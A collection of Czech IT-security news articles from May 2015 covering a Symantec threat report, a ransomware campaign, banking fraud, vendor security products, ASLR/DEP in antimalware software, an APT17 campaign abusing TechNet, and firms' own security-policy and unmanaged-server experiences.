22.5.2015 Hrozby
Změnu taktiky počítačových podvodníků odhaluje Nejnovější vydání Zprávy o internetových bezpečnostních hrozbách (Internet Security Threat Report, ISTR) společnosti Symantec. Ti se totiž snaží nenápadně infiltrovat sítě největších organizací a vyhnout se přitom detekci. A mají i jiné triky.

Obrazně řečeno, útočníci se nepotřebují pokoušet vyrážet dveře, když mohou bez jakéhokoliv rozruchu získat klíče. Podvodníci se pomocí různých triků snaží přimět podniky, aby si infekci do sítě pustily samy.

Trojské koně se např. vydávají za aktualizace běžných programů. Stačí počkat, až si je oběti stáhnou, a útočníci mohou získat až neomezený přístup do firemní sítě.

Poslední rok byl podle Symanteku rekordní z hlediska tzv. zero day zranitelností (jde o chyby, proti nimž výrobce softwaru dosud nenabízí opravu). Průzkum ukazuje, že softwarovým firmám trvá vytvoření a distribuce záplaty v průměru 59 dní; o rok dříve to přitom byly pouhé 4 dny. Útočníci dokáží tohoto zpoždění využít – pro srovnání, v případě medializované chyby Heartbleed se první pokusy o zneužití zranitelnosti objevily už za pouhé 4 hodiny.

Podvodníci loni také pokračovali ve vysoce cílených útocích (spear-phishing), jejichž množství loni vzrostlo o 8 %. Zvláštní pozornost si zaslouží přesnost těchto útoků; k úspěšnému navedení oběti na škodlivé weby (které provádějí tzv. drive-by download útoky či jiné způsoby zneužití) a stažení malwaru stačilo v roce 2014 útočníkům posílat o 20 % méně phishingových e-mailů.

Přibývá pokusů o vydírání

E-mail zůstává významným vektorem útoků, nicméně počítačoví podvodníci experimentují i s novými metodami. Zneužívání mobilních zařízení či sociálních sítí jim umožňuje s menším úsilím zasáhnout více lidí.

Útočníci jsou v podstatě líní, takže preferují automatizované nástroje a snaží se, aby oběti za ně samy udělaly příslušnou práci. V loňském roce bylo 70 % podvodných odkazů v sociálních médiích sdíleno ručně. Útočníkům jistě dělá radost, nakolik jsou lidé ochotni důvěřovat obsahu sdílenému jejich přáteli.

Podobné podvody mohou zločincům přinést rychlý, ale jen omezený zisk. Někteří proto preferují lukrativnější a agresivnější útoky, jako je např. ransomware. Množství malwaru, který své oběti vydírá, vzrostlo loni o 113 %. Oproti roku 2013 se 45krát zvýšil počet obětí, jimž malware zašifroval jejich data.

V minulosti byl přitom rozšířenější „tradiční“ ransomware, který zpravidla předstíral, že jeho odesilatelem je policie nebo podobná instituce. Oběť byla při tomto podvodu např. obviněna ze stažení obsahu chráněného autorskými právy a měla zaplatit pokutu.

Nyní útočníci častěji nic nepředstírají a otevřeně požadují výpalné, když před tím oběti šifrováním znepřístupní soubory, fotografie a jiný obsah.


Vyděračský malware se vrací na tuzemskou scénu, opět modifikovaný

22.5.2015 Viry
V Česku proběhla další vlna nevyžádané e-mailové pošty s infikovanou přílohou. Cílem však prý není, jako obvykle, vykrást oběti bankovní účet, ale zašifrovat data a získat výkupné.

Elenoočka, která se v kampani využívá, je obávaný trojan typu downloader, který se poprvé objevil v květnu 2014. Nástup tohoto malwaru na scénu byl cílený na několik evropských zemí, mezi nimi i na Českou republiku. Následovala série kampaní, vždy s odstupem zhruba dvou měsíců, které všechny měly společný průběh i cíl.

Šlo o důvěryhodně vypadající e-maily, kde odesílatel upozorňoval na údajně neuhrazenou fakturu, nevyřízenou objednávku, informace o zásilce na cestě apod. – a to s cílem přimět adresáta, aby otevřel přiložený soubor. Ten vypadal jako wordovský nebo PDF dokument, ale ve skutečnosti šlo o spustitelný soubor, který do počítače oběti zavedl downloader Elenoočka.

Elenoočka byla ve všech kampaních v roce 2014 používána k tomu, aby do počítače oběti stáhla a nainstalovala specializovaný malware na vykrádání bankovních účtů.

Aktuální kampaň však šíří variantu tohoto downloaderu, která místo bankovního malware stahuje šifrovací malware FileCoder. Ten v napadeném počítači zašifruje soubory, zamkne obrazovku a zobrazí na ní výzvu k zaplacení výkupného.
 

Spamová kampaň Elenoočky, která v České republice proběhla ve dnech 15. a 16. dubna 2015, byla druhou kampaní v řadě, kdy byla Elenoočka použita k šifrovacímu vyděračskému útoku. Naplňuje se tak prognóza analytiků Eset, kteří po první kampani tohoto druhu v lednu 2015 předpovídali další pokračování.

„Elenoočka je obávaný downloader a maily, které jej šíří, vypadají čím dál důvěryhodněji. To, že tento malware byl již podruhé po sobě využit k šifrovacímu vyděračskému útoku namísto tradičních bankovních útoků, je pozoruhodné. Může to znamenat, že útoky na internetové bankovnictví nesplnily očekávání internetového podsvětí a že zločinci mění strategii,“ komentuje aktuální kampaň Robert Šuman, vedoucí pražského detekčního a analytického týmu společnosti Eset.

To by bylo v souladu se závěry panelu expertů na prestižní konferenci právnické fakulty americké Georgetown University “Cybercrime 2020: The Future of Online Crime and Investigations”. Podle tohoto panelu je představuje vyděračský malware budoucnost online kriminality.

Šifrovací malware FileCoder je podobný známějšímu a rozšířenějšímu CryptoLockeru, od něhož se liší především způsobem využití šifrovacího algoritmu.

„Ochranná opatření před šifrovacími útoky jsou pro všechny varianty šifrovacího malware stejná: zálohovat data, aktualizovat software a chránit počítače,“ doporučuje Pablo Ramos, ředitel výzkumu společnosti Eset v Latinské Americe.


Česko je testovací laboratoří bankovních elektronických útoků

22.5.2015 Bezpečnost
ČR je na 8. místě s největším rizikem útoku na bankovní účty s přepočtem na počet obyvatel. Situaci komplikuje i rozvoj mobilních platforem a mobilního bankovnictví. I sociální sítě jsou zdrojem, odkud mohou útočníci útočit. Komerční banka chce proto ve spolupráci s IBM chránit počítače klientů.

Česko je testovací laboratoří bankovních elektronických útoků, tvrdí Tomáš Strýček, výkonný ředitel společnosti AEC, která se specializuje již více než 20 let na zabezpečení dat. Jsme prý na 8. místě s největším rizikem útoku na bankovní účty s prepoctem na počet obyvatel. Důvodů je proto několik.

„Je zde extrémní tlak klientů na expresní platby mezi účty, čímž se zkracuje doba, kterou má banka na odhalení případného podvodu. Situaci komplikuje i rozvoj mobilních platforem a mobilního bankovnictví, protože mobily mají lidé zabezpečené výrazně méně než PC. Také sociální sítě jsou zdrojem, odkud mohou útočníci útočit. Poskytují totiž útočníkům o lidech tolik informací, které jim usnadňují napadení jejich účtů,“ vysvětluje Strýček.

I proto Komerční banka zpřístupnila klientům zdarma speciální software IBM Trusteer Rapport, který podle IBM vytváří zabezpečený tunel mezi prohlížečem uživatele a navštívenou stránkou (v tomto případě on-line bankovnictví), odráží případné útoky i pokusy o podvržení falešných stránek. Klienti si řešení IBM na ochranu svého počítače instalují z bezpečného prostředí internetového bankovnictví MojeBanka. Bezpečnostní software si dosud stáhlo více než 25 tisíc klientů Komerční banky.

Již dlouhou dobu jsou to totiž právě počítače klientů, které internetoví útočníci ke zneužití internetového bankovnictví využívají.
Komerční banka zároveň vyzývá klienty, aby se při práci s počítačem, ze kterého se přihlašují do prostředí internetového bankovnictví, chovali maximálně obezřetně. Zejména doporučuje používat výhradně legální software, pravidelně aktualizovat operační systém i další programy (např. internetový prohlížeč, čtečku PDF dokumentů) a používat antivirové programy. Na místě je zejména obezřetnost při otevírání e-mailů i SMS, které se tváří, že jsou odeslány z banky klienta či jiného, na první pohled, důvěryhodného zdroje.

„Nechceme pasivně vyčkávat, až na naše klienty někdo zaútočí a bude se je pokoušet připravit o jejich peníze. Pokud klienti dodrží jednoduché, ale velmi důležité zásady bezpečného chování a dále si nainstalují doporučený nástroj, sníží významně riziko napadení svého počítače a tím i ohrožení svých financí,“ uvedl Albert Le Dirac’h, předseda představenstva a generální ředitel KB.

Bezpečnostní řešení IBM na ochranu počítače klienta funguje na operačních systémech Windows a Mac OS. Klienti Komerční banky si jej mohou instalovat zcela zdarma a bez jakýchkoli podmínek ze zabezpečeného prostředí internetového bankovnictví MojeBanka. Stačí, aby se standardním způsobem přihlásili a program si bezpečně stáhli.

„Jde o technologii, která je schopna reagovat i na nejnovější formy útoků,“ uvedl Branislav Šebo, generální ředitel IBM Česká republika.


Eset nově vstupuje na pole šifrování i zálohování dat

21.5.2015 Software
Nástroj DESlock+ pro šifrování dat a řešení StorageCraft pro zálohování a obnovu uvedl bv tuzemsku na trh Eset. Oba produkty jsou integrované se současnými řešeními Esetu a jsou součástí nově ustavené Eset Technology Alliance (ETA).

ETA představuje vybrané společnosti se specializací na konkrétní části IT bezpečnosti a Eset chce jejím prostřednictvím nabídnout svým zákazníkům vyšší zabezpečení pomocí kombinace svých technologií a produktů třetích stran.

DESlock+ je jednoduchý šifrovací produkt včetně mobilních platforem. Na klientské straně umožňuje šifrování souborů, složek a e-mailů, a také celých disků či vyměnitelných médií.

DESlock+ Enterprise server zase dovoluje spravovat uživatele a pracovní stanice a vykonává různé úlohy -- od aktivace, změny bezpečnostních politik, nastavení, šifrovacích klíčů až po požadavky na stav bezpečnosti koncových stanic.

StorageCraft zase představuje řešení pro zálohování a obnovu dat, ochranu dat a migraci pro fyzické, virtuální a hybridní prostření Windows a Linux.

Umožňuje automatické zálohování souborů a kompletního operačního systému, včetně aplikací a služeb.
 

Je také nezávislý na hardwaru: obnovení systému může proběhnout na jiném fyzickém stroji nebo ve virtuálním prostředí.

Vlastnosti DESlock+ podle dodavatele:

Šifruje pevné disky, výměnná média, soubory a e-maily
Transparentní zabezpečení s použitím 256bitového AES šifrování a certifikací dle FIPS 140-2
Vzdálená správa umožňuje jednoduše spravovat uživatele a pracovní stanice na dálku, včetně sdílení klíčů mezi klienty v reálném čase
Podpora Windows 8 a 8.1 včetně UEFI a GPT

Vlastnosti StorageCraft podle dodavatele:

Zálohování souborů a kompletního operačního systému včetně aplikací a služeb
Úspora místa díky malé velikosti zálohy disku
Úspora času díky automatickému procesu pravidelných záloh
Nezávislost na hardwaru - obnovení systému na jiném fyzickém nebo virtuálním stroji
Rychlé a snadné načtení libovolné zálohy na virtuálním stroji


Poskytněte zaměstnancům zabezpečenou mobilní platformu – Samsung KNOX

21.5.2015 Mobil
Pro spousty IT manažerů je využívání soukromých telefonů ve firmách noční můrou. Trend BYOD ale bude dále sílit a je třeba se s ním vyrovnat tak, aby nedošlo k narušení firemní IT bezpečnosti.

Vyřešit tyto na první pohled protichůdné požadavky pomáhá zabezpečená platforma Samsung KNOX, která nabízí certifikovanou bezpečnost na nejvyšší úrovni a ponechává majiteli mobilu flexibilitu v jeho používání a přizpůsobení.

Může tak napomoci rozšíření používání chytrých telefonů ve firmách, které se tomu s odkazem na bezpečnostní rizika dosud brání, a připravují se tak o výhody v podobě vylepšení řízení vztahů se zákazníky, zrychlení obchodních procesů a zvýšení dostupnosti informací pro pracovníky v terénu.

Samotná zabezpečená platforma Samsung KNOX byla představena v roce 2013 jako součást zabezpečené verze operačního systému Android. Letos získala ocenění GSM Asociace na Mobile World Congressu 2015 v Barceloně. Platforma má certifikáty, které potvrzují, že splňuje nejpřísnější bezpečnostní požadavky na využití na vládní úrovni například v USA nebo Velké Británii.

Výhody Samsung KNOX jsou především:

eliminuje bezpečnostní rizika a snižuje náklady na bezpečnostní řešení třetích stran, která je třeba integrovat do IT systémů, politik a nakonec samotných smartphonů a ke kterým je třeba vyškolit vlastní specialisty nebo je draze outsourcovat;
umožňuje bezpečně využívat nové aplikace pro chytré telefony, které zlepšují vztahy se zákazníky, umožňují uzavírat obchody nebo řešit obchodní případy, řešit technické záležitosti a poskytovat zaměstnancům aktuální informace. V neposlední řadě neomezuje zaměstnance ve využívání chytrého telefonu a ti se tak nebudou bránit ani využívání firemních aplikací. A zejména nebudou nuceni obcházet bezpečnostní politiky, jako to dělají nyní, kdy smartphony v terénu používat nesmějí, ale kvůli usnadnění práce to dělají.

Z pohledu koncového uživatele se fungování mobilního telefonu nezmění. Dál si jej může přizpůsobovat, instalovat vlastní aplikace a používat ho tak, jak je zvyklý. Pouze mu přibude složka s firemními aplikacemi. Ty se ale již připojují přes šifrované spojení a k jejich spuštění nedojde v případě, že by bezpečnostní platforma měla jakékoliv podezření na to, že bylo s platformou jakkoliv manipulováno.

Šifrovaná jsou veškerá data, která tyto aplikace využívají. Samsung KNOX umí i rozlišit, kolik dat přenesl uživatel soukromě a kolik potřeboval pro firemní aplikace, takže je pak možné i toto využití datových přenosů pro soukromé účely vyúčtovat.

Správci IT ve firmách mají k dispozici nástroje pro správu připojených telefonů s platformou Samsung KNOX, díky kterým můžou řídit jednotlivé přístupy i telefony na dálku zablokovat či vymazat. K dispozici mají v tuto chvíli více než 500 certifikovaných aplikací pro širokou škálu firemních aplikací včetně aplikací Kontakty, Kalendář, Telefon, Prohlížeč, Fotoaparát a E-mail, takže pro tyto úkoly tak není nutné používat běžné necertifikované aplikace.

Samsung KNOX je plně integrován do operačního systému Android a využívá hardwarovou podporu v telefonech Samsung S6 a Samsung S6 edge. Již při startu operačního systému se díky technologii Trusted Boot kontroluje, zda jsou všechny systémové soubory v pořádku a je tak možné zabránit spuštění jakéhokoliv škodlivého programu. Stejně tak při běhu systému a spouštění aplikací architektura TIMA (TrustZone-based Integrity Measurement Architecture) zajišťuje, že není možné chod aplikací narušit žádným malwarem.

Bezpečnost a autentizaci je dále možné rozšířit o SmartCard nebo jednorázová hesla. Celá platforma Samsung KNOX je škálovatelná a každá firma může její využití nastavit tak, aby vyhovovala firemní politice IT bezpečnosti.

Samsung KNOX lze jednoduše integrovat se stávajícími řešeními MDM, VPN a Microsoft Exchange ActiveSync, díky čemuž lze zabezpečení přizpůsobit tak, aby vyhovovalo potřebám firmy. Kompletní funkce správy obsahují více než 500 podporovaných zásad IT dostupných v rámci platformy KNOX a více než 1 000 rozhraní API řešení MDM. Navíc se jejich počet každý den zvyšuje.

Možnosti Samsung KNOX jsou ale mnohem širší, ať už v otázkách bezpečnosti, tak správy a využití aplikací, než může pojmout tento článek. Více informací najdete na stránkách www.samsungknox.com.

ČTYŘI NEJ Galaxy S6 a S6 edge

Design – Smartphony Samsung Galaxy S6 a Galaxy S6 edge mají 5,1palcový Quad HD Super AMOLED displej s vysokou hustotou pixelů (577 ppi) a jasem (600 cd/mm). Displej Galaxy S6 edge je navíc jako první na světě zakřivený po obou stranách, což ještě více rozšiřuje funkce telefonu a možnosti uživatelů. Jedinečnost skvělého designu jen podtrhují zvolené materiály, z kterých jsou telefony vyrobeny – sklo a kov.

Nabíjení – Díky plně integrované certifikované technologii bezdrátového nabíjení je můžete nabíjet přes všechny bezdrátové podložky, které podporují normy WPC a PMA. Při klasickém nabíjení přes kabel vám poskytnou přibližně 4 hodiny provozu už za pouhých 10 minut v síti.

Rychlost – Samsung opatřil své nejnovější smartphony prvním 64bitovým procesorem na světě vyrobeným 14nm technologií. Společně s novým paměťovým systémem LPDDR4, flash pamětí UFS 2.0 a prvním kodekem na světě na bázi hardwaru 1440P/VP9 poskytují vyšší výkon a rychlost paměti současně s nižší spotřebou energie.

Fotoaparát – Oba nové smartphony jsou vybaveny špičkovými fotoaparáty se světelností F1.9 a snímači s rozlišením 5 Mpix (přední) a 16 Mpix (zadní). Společně s pokročilými fotografickými funkcemi tak poskytují nejvyšší kvalitu i za špatných podmínek. Nová funkce Quick Launch navíc umožňuje rychlý přímý přístup k fotoaparátu z libovolné obrazovky za 0,7 sekundy pouhým dvojitým stisknutím tlačítka Home.


Jak bezpečný je samotný antimalware?

21.5.2015 Analýzy
Bezpečnostní software chrání před zneužitím jiných aplikací. Jak je na tom ale s ochranou před zneužitím on sám?

Podle všeobecně přijímaného názoru připadá i v kvalitně napsaném softwaru jedna chyba na zhruba dva tisíce řádků kódu. Počet řádků ve složitých aplikacích přitom jde do milionů, v operačních systémech dokonce do desítek milionů. Počet chyb se tedy může pohybovat i v řádu desítek tisíc – a v tomto množství se samozřejmě mohou objevit i takové, které umožňují zneužití aplikace či OS.

Institut AV-Test, který se specializuje na antivirový výzkum a testování bezpečnostního softwaru, nedávno udělal test ochrany bezpečnostních řešení před zneužitím možných bezpečnostních děr v jejich programovém kódu.

Princip zkoušek přitom spočíval právě v kontrole, zda výrobci důsledně používají metody ochrany ASLR a DEP. Jde o open source mechanismy, které se všeobecně doporučují jako standardní ochrana softwaru. Tady je názorMaria de Boera, research directora v Gartneru, na celou problematiku.

Domníváte se, že bezpečnostní software by měl být bezpečnější než běžné aplikace?

Samozřejmě ano. Především proto, že bezpečnostní aplikace, už ze samotné své podstaty, fungují s vysokými oprávněními a současně často pracují s neznámým a podezřelým obsahem. Navíc některé bezpečnostní aplikace běží na milionech počítačů. To dohromady z nich dělá lákavý terč.

Nedělal jsem ale na toto téma žádný výzkum, takže porovnání nemůžu kvantifikovat. Je však známé, že bezpečnostní aplikace relativně běžně vykazují bezpečnostní díry. A je jisté, že se v nich budou objevovat další a další chyby. To je při rozsahu jejich kódu nevyhnutelné.

ASLR a DEP jsou důležité nástroje pro posílení zabezpečení aplikací. Zjednodušeně řečeno, tyto metody výrazně omezují možnost softwarového zneužití bezpečnostních děr v aplikacích. Samozřejmě ale nejde o nějaké zázračné řešení – ostatně objevují se další a další útoky, které se různými technikami pokoušejí ochranu pomocí ASLR a DEP obejít.

Měli by se uživatelé bezpečnostního softwaru zajímat, zda jejich výrobce využívá ASLR a DEP?

Určitě ano. Používání ASLR a DEP je standard, navíc je to open source, tedy bez jakýchkoli licenčních nákladů. Samozřejmě že existují i jiné metody, jak posílit zabezpečení aplikací před zneužitím bezpečnostních děr, ale žádná taková metoda se nevylučuje s těmito dvěma. Nevidím tedy vůbec žádný důvod, proč tyto ASLR a DEP nepoužívat.

Výrobci bezpečnostního softwaru, kteří nepoužívají technologie ASLR a DEP – nebo je aplikují nedůsledně – předkládají podle zjištění AV-TEST různé důvody. Například tvrdí, že některé knihovny třetích stran ASLR a DEP nepoužívají…

To sice dává smysl, ale vzhledem k tomu, že máme rok 2014, není to úplně přesvědčivý argument. Vždyť DEP byl do kernelu systému Windows zaveden před deseti lety a ASLR jen krátce nato.
 

…nebo že jednotlivé soubory využívají proprietární technologie, které nejsou s ASLR a DEP kompatibilní…

Tady pozor: To jinými slovy znamená, že software se vytvořil způsobem, který neumožňuje implementovat běžné metody zabezpečení. Jistě, může jít o moderní techniky, které lze zabezpečit jinými metodami, ale spíše se obávám, že půjde o pozůstatky starých programovacích technik, jejichž používání by bylo vhodné co nejrychleji přehodnotit.

…nebo že soubory, které nejsou chráněné pomocí ASLR a DEP, se již aktivně nevyužívají, a proto nemá smysl uvažovat o nich jako o rizikovém faktoru.

No, to sice taky dává smysl, ale jen na první pohled. Proč však jsou takové soubory stále součástí aplikace? Upřímně, takovému argumentu bych se vyhýbal. Vždyť je to vlastně přiznání, že software obsahuje historický balast… To není dobrá vizitka pro software ani pro jeho tvůrce.

…anebo že daný software využívá jiné metody ochrany jako CFI – Control Flow Integrity – či sandboxing.

Ano, to jsou pokročilé ochranné techniky a já jejich používání doporučuji. Nikoli však jako náhradu standardních metod, ale jako jejich doplněk. Opravdu platí, že ASLR a DEP jsou metody, jejichž využití nemá být možností, ale povinností.

Vysvětlení pojmů

ASLR – Address Space Layout Randomization (randomizace rozvržení paměťového prostoru jádra).
Používá se náhodné rozmístění různých objektů místo používání pevných adres, čímž významně komplikuje možnost zneužít bezpečnostní díry v aplikacích.

DEP – Data Execution Prevention (prevence spuštění dat). Slouží především k boji proti chybám typu buffer overflow. Spočívá v tom, že oblasti paměti se rozdělí na ty, v nichž lze spouštět programy, služby driverů apod., a na sféry, kde to je zakázané. Výsledkem je, že škodlivý kód nemůže zasahovat do oblastí paměti, kde pracují operační systém a jeho služby.


Hackeři začali využívat pro své ataky TechNet, známý portál Microsoftu

21.5.2015 Incidenty
Čínští hackeři podle nových informací společnosti FireEye začali ke svým kybernetickým útokům zneužívat známý portál TechNet, který vlastní Microsoft.

Skupina hackerů, kterou FireEye přezdívá jako APT (Advanced Persisent Threat) 17, již v minulosti podnikla řadu útoků na počítačové sítě právnických firem, obchodníků se zbraněmi, vládních agentur či technologických firem. Nově skupina APT 17 - někdy také přezdívaná jako DeputyDog – ke svým sofistikovaným útokům používá účty na webovém portálu TechNet.

V rámci nového útoku si hackeři vytvoří účet na TechNetu a následně zanechávají na tomto blogu komentáře, v nichž jsou zakódovány instrukce pro variantu jejich červa BLACKCOFFEE. Pokud na danou stránku vstoupí uživatel, jehož systém je pomocí tohoto škodlivého kódu infikován, červ rozpozná instrukci zakódovanou v komentáři a přesměruje nic netušícího uživatele na doménu ATP17, pomocí níž mohou útočníci jeho systém na dálku ovládat. Zabezpečení TechNetu tedy při této formě útoku nebylo nijak prolomeno.

Většina hackerů využívá při podobných útocích méně známé webové stránky, které mohou snadno upravit, avšak využití známějších webů typu fór TechNetu není také ničím neobvyklým. Podle Bryce Bolanda ze společnosti FireEye totiž hackeři často chtějí, aby infikovaný počítač přistupoval nejprve k doméně, která v očích uživatelů nevypadá podezřele, než jej přesměrují na doménu jinou.
 

Jak dodal Boland, někdy jsou domény, pomocí nichž hackeři ovládají počítače uživatelů, již vloženy do samotného červa, avšak v takových případech mohou bezpečnostní experti nebezpečné stránky snadno identifikovat. Často je tedy příkaz ke kontaktování serverů útočníků na různé webové stránky.

Podle Bolanda útočníci takto v čím dál větší míře zneužívají legitimní domény typu Google Docs či Twitteru, což je pro jejich administrátory velkým problémem.

„ATP17 útočí na naše zákazníky již řadu let,“ dodal Boland s tím, že nejčastějším typem útoku je phishing, při němž jsou zaměstnancům různých firem odesílány e-maily obsahující odkazy na nebezpečné webové stránky či přílohy.

Čínská skupina hackerů již řadu let využívá k infikaci počítačů program BLACKCOFFEE, jenž mimo jiné umí na dálku ze systémů uživatelů mazat nebo na ně nahrávat různé soubory.


Je čas vyladit bezpečnostní pravidla

21.5.2015 Zabezpečení
Každé zásady, bez ohledu na to, jak dobře se vytvoří, vyžadují pravidelnou revizi. Náš manažer tuto činnost dělá po prázdninách.

Každý podzim dělám revizi zásad. Myslím si, že je dobré mít ve svém kalendáři tuto činnost pravidelně zanesenou, protože žádná pravidla, bez ohledu na to, jak dobře se vytvoří, nevydrží beze změny navěky.

Vznikají nové standardy a staré se mění, což způsobuje, že některé původní zásady už nedostačují. Nebo nějaký bezpečnostní incident, audit či událost ve firmě, o které se dříve nevědělo, odhalí, že se už neplní bezpečnostní potřeby.

Pokud by každou úpravu pravidel musela schválit naše skupina vytvořená právě pro potřeby zásad (tvoří jej zástupci personálního oddělení, právního oddělení a šéf IT), probíhala by tato činnost velmi pomalu.

Je prostě příliš těžké dostat je všechny ve stejnou dobu do jedné místnosti. Když jsem do naší firmy nastoupil, potřeboval jsem, aby tato skupina mé úvodní zásady schválila. Musel jsem je přilákat do konferenční místnosti na pizzu, abych je tam dostal všechny najednou.

Tam jsme také udělali dohodu. Smím dělat přírůstkové změny bez jejich vyjádření. Vykonávám tedy potřebné zásahy, předávám skupině nové znění a potom čekám na jejich reakce. Obvykle se ale nikdo neozve.

Vynucené změny

Letos pracuji na několika úpravách. První na řadě jsou hesla. Máme pro ně velmi přísné zásady, co se týče složitosti a frekvence změny.

Měli jsme však pro hesla i několik dalších pravidel, které ale zůstávaly téměř bez povšimnutí, protože byly pohřbené v dalších IT dokumentech. Vytáhl jsem je tedy, přepsal s ohledem na konzistenci a všechny sloučil do jednoho komplexního pravidla.

Dále jsem potřeboval vyřešit zásady, které se vztahují k našemu rozsáhlému využití cloud computingu. Velké části naší infrastruktury a aplikací se nyní hostují a převládající myšlenkou je, že jakmile přestaly být součástí naší interní infrastruktury, přestaly pro ně platit i naše pravidla pro DMZ (demilitarizovaná zóna).

DMZ však stále představuje rozhraní vůči veřejnosti a slouží i našim zákazníkům. S touto skutečností na paměti jsem upravil zásady pro DMZ, aby bylo jasné, že všechny prostředky mezi veřejným internetem a naší důvěryhodnou produkční sítí se musí chránit firewallem a dalšími systémy pro zabezpečení sítě, a to bez ohledu na skutečnost, kde se naše zdroje fyzicky nacházejí.

Když už mluvíme o firewallech, nedávno jsem udělal zběžnou kontrolu jejich pravidel pomocí nástroje FireMon -- a výsledkem bylo odhalení několika nevyužívaných zásad.

Jsem důsledným zastáncem silného zabezpečení, dokonce i v redundantní podobě, ale opatření, která neslouží žádnému skutečnému účelu, nám nepomohou. Zeptal jsme se tedy administrátora firewallů, proč nepoužívaná pravidla neodstranil.

Jeho odpovědí bylo, že nemáme žádné zásady, které by takovou operaci dovolovaly. Ale s tím mohu rychle pomoci - upravil jsem naše pravidla tak, aby správce firewallů musel zakázat každou zásadu, která se nevyužila během 30 dnů a odstranit ji po uplynutí 90 dnů.

Přijatelné používání

Nejdůležitější ze všech našich pravidel je takzvané přijatelné používání, protože jeho dodržování musí všichni zaměstnanci každý rok potvrdit. Jako každá zásada ani tato není dokonalá, takže bylo potřeba v ní udělat určité úpravy.

Například od doby, co se upravovala naposledy, začali zaměstnanci používat software pro vzdálený přístup, aby se mohli z domova nebo odjinud připojit k počítači, který si ponechali v zaměstnání.

Nyní jsem používání takového softwaru výslovně zakázal, neboť porušuje naše požadavky ohledně šifrování a dvoufaktorové autentizace při vzdáleném přístupu.

Samozřejmě, že úprava někdy nestačí. Musel jsem vytvořit i zcela nové pravidlo, a to kvůli nedávné akvizici. Předpokládáme využití cca 30 vyhrazených připojení VPN typu bod-bod. Nikdy jsme takové věci nepovolovali, ale vypadá to, že to momentálně představuje nejlepší způsob, jak našim nově získaným zahraničním pracovníkům získat přístup k našim zdrojům pro výzkum a vývoj v naší interní síti.

Převzatá firma také neměla pro taková připojení žádné zásady, standardy nebo směrnice, takže jsem vytvořil tzv. „Zásadu pro připojení partnerů,“ která pro ně specifikuje příslušná pravidla. A když tu mám zcela nové pravidlo, je čas opět objednat pizzu.


Desítky objektů najednou umí díky analytice střežit dohledová novinka RVS

21.5.2015 Software
Remote Video Solution (RVS), monitorovací systém, které umožňuje jedinému operátorovi střežit v reálném čase i 100 objektů najednou, uvedla na náš trh firma Securitas. Systém podle ní nahrazuje běžné průmyslové kamery a dovoluje na pachatele i psychologicky působit.

Monitorovací systém RVS operátorovi značným způsobem rozšiřuje omezené lidské možnosti. I když jediný pracovník hlídá například sto kamer, nepotřebuje k tomu sledovat spoustu monitorů najednou.

Ve službě se totiž opírá o sofistikovaný kamerový systém vybavený inteligentní video-analýzou. Jakmile kamera vyhodnotí poplach v konkrétním sektoru, spustí se operátorovi automaticky pouze ten monitor, který má zobrazovat ohroženou oblast, zbylé monitory zůstanou ve spícím režimu. Operátor stav následně vyhodnotí a adekvátním způsobem zareaguje.

Ostraha má podle dodavatele k dispozici i hlasový přenos do střeženého prostoru skrze výkonné reproduktory, což v jistém smyslu funguje i jako psychologická zbraň s určitým zastrašujícím účinkem. Pracovník pak může okamžitě reagovat na vzniklou situaci a ovlivnit situaci v místě.

V praxi třeba promluví k narušiteli stylem ‚pane v černé kapuci, který stojíte u vchodu do haly, okamžitě opusťte lokalitu,‘ rozsvítí světla či spustí sirénu. Dále může celý prostor zadýmit a znemožnit pachateli orientaci zrakem. Pokud ani to nepomůže, vysílá na místo zásahovou jednotku nebo volá rovnou Polici ČR.


Nenechte se zaskočit zranitelnými servery

21.5.2015 Zranitelnosti
Ve firemní infrastruktuře se objevily nezáplatované stroje, které jsou navíc dostupné z internetu. Jak se to mohlo stát?

Právě se našlo 30 serverů, za které nikdo nenesl odpovědnost. Třicet serverů dostupných z internetu bez ochrany proti malwaru a bez instalovaných záplat. Musím se uklidnit a zjistit, jak špatné to je a co můžeme udělat, aby se takové situace již nikdy neopakovaly.

Vyšlo to najevo, protože shromažďuji metriky, které mohu prezentovat našemu šéfovi IT při jeho čtvrtletní kontrole. Je mezi nimi mimo jiné i počet našich nespravovaných prostředků. To je číslo, u kterého vždy budeme chtít vidět pokles.

Úplná eliminace nespravovaných prostředků je pravděpodobně mimo naše možnosti, nicméně aspoň je chci dostat do našeho vývojového prostředí a udržet je mimo demilitarizovanou zónu, která je částí sítě vystavující aplikace a infrastrukturu okolnímu světu.

Naše produkční prostředí je za firewallem, který mu tak zajišťuje ochranu před sítí oddělení výzkumu a vývoje, kterou sám nazývám „velmi Divokým západem“.

Snažili jsme se přimět personál z tohoto oddělení, aby lépe spravoval své prostředky, ale pracovníci mají tolik izolovaných požadavků, že to zkrátka nelze plnit. Než abychom bojovali v bitvě, kterou nemůžeme nikdy vyhrát, umístili jsme jejich zdroje za jejich vlastní firewall a nastavili pravidla, která omezují, co jejich prostředky mohou dělat a kam mohou přistupovat.

Protože si ale myslím, že jsme tak silní, jak silný je náš nejslabší článek, důrazně prosazuji správu konfigurace v naší produkční síti. Cílem je dodržení této zásady u prostředků dostupných z internetu.

Metrika nespravovaných prostředků se vytváří skenováním prostřednictvím produktu Nessus a porovnáním s údaji, které nám provozní personál sdělí ohledně možné správy. Rozdíl tvoří počet nespravovaných systémů.

Objevené zranitelné servery

Samozřejmě mě šokovalo, že Nessus objevil 30 serverů dostupných z internetu, které se neobjevují na správní konzoli našich podnikových systémů. Hned, jak jsem se probral z úvodního šoku, jsme zkontrolovali tyto servery ručně.

Kromě selhání v oblasti malwaru a záplat (žádné aktualizace za více než šest měsíců) jsme také zjistili, že některé z těchto nespravovaných prostředků jsou linuxové servery s nainstalovanými kompilátory open source kódu.

Některé z nich dokonce měly spuštěné výchozí služby, které jsou přinejmenším riskantní, jako jsou třeba Telnet nebo FTP.

A ještě zbývá zjistit, kdo tyto servery provozuje. E-mail s touto otázkou, zaslaný veškerému IT personálu, zůstal bez odpovědi. Dobře, takže dalším krokem je vypnutí portů přepínačů, ke kterým jsou tyto servery připojené, a uvidí se, kdo se ozve.

Trvalo to déle než tři dny, ale nakonec někdo z jednoho podnikového oddělení přece jen provoznímu týmu IT zavolal. Ukázalo se, že poskytovali servery zákazníkovi kvůli ověření nějakého konceptu.

Toto oddělení to mohlo udělat díky tomu, že jeden z jeho správců býval členem IT týmu a stále měl přístup pro Lab Manager, což je server centralizované správy sloužící ke spouštění virtuálních strojů.

Tento správce navíc uvedl, že si myslel, že Lab Manager umístil servery jen do sítě oddělení výzkumu a vývoje a ne do demilitarizované zóny.

Jaké je poučení?

